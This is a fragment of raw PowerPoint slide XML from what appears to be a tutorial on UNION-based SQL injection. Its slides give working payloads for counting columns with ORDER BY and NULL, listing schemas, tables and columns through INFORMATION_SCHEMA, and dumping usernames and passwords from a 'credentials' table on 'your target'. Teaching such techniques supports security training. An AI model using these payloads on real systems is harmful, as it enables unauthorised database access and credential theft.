              </a:rPr>
              <a:t>order by  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>order by -- - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>operation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>	select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>title, cost from product where id =1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>order by 1 </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>order </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>1– </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>‘ order </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>2– </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>‘ order </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>3—</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Determining the number of columns required in an SQL injection UNION attack using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> VALUES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>' UNION SELECT NULL--</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="218192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Step2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>use actual column number with union </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>operation     {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>konta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>kon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t> column </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>ber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>korte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>hbe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>        example: ‘ union select 1,2,3-- - </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0" smtClean="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u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t>Method for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dumping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t> data from database using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" u="sng" dirty="0" err="1"/>
              <a:t>Uninon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t> SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Schema,Schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> check:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>&gt; SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="2000"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228" y="1072273"/>
            <a:ext cx="5266950" cy="2347387"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2743325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2000" dirty="0"/>
              <a:t>Well, a schema in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t> is a collection of database objects linked with a particular </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t> username. The username that I am talking about is called the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" u="sng" dirty="0"/>
              <a:t>Schema owner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>, or more appropriately the owner of the related group of objects. Let us dig this topic a bit deeper and discuss it in detail!</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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916" y="1066470"/>
            <a:ext cx="6690881" cy="5242775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="691795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Step 1: Schema/Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>check</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" u="sng" dirty="0"/>
              <a:t>Step 2: Tables check</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> ' UNION select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>1,TABLE_NAME,TABLE_SCHEMA,4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>from INFORMATION_SCHEMA.TABLES where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>'-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>	Here </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>is database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>which will replace to your target database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>name.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" u="sng" dirty="0"/>
              <a:t>Step3: Columns check</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> ' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>'credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>'-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>	Here </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>is table name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>whick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> will replace to your target table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" u="sng" dirty="0"/>
              <a:t>Step4: Dum Data from table:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> ' UNION select 1, username, password, 4 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>dev.credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t> password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>are</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" u="sng" dirty="0"/>
              <a:t> column </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>name , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" u="sng" dirty="0"/>
              <a:t> database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>name , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" u="sng" dirty="0"/>
              <a:t> table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>name</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="488051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446</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11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-06-25T06:21:23Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-26T19:28:39Z</dcterms:modified>
</cp:coreProperties>
</file>